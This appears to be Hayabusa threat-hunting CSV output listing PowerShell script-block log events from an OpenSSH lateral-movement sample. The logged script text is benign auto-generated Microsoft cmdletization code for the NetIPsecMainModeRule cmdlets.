[Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MainModeCryptoSet')) { [object]$__cmdletization_value = ${MainModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; V",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"ord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeRule' -Alias '*' function Set-NetIPsecMainModeRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MainModeCryptoSet')) { [object]$__cmdletization_value = ${MainModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; V",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"alue = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecMainModeRule' -Alias '*' function Remove-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] 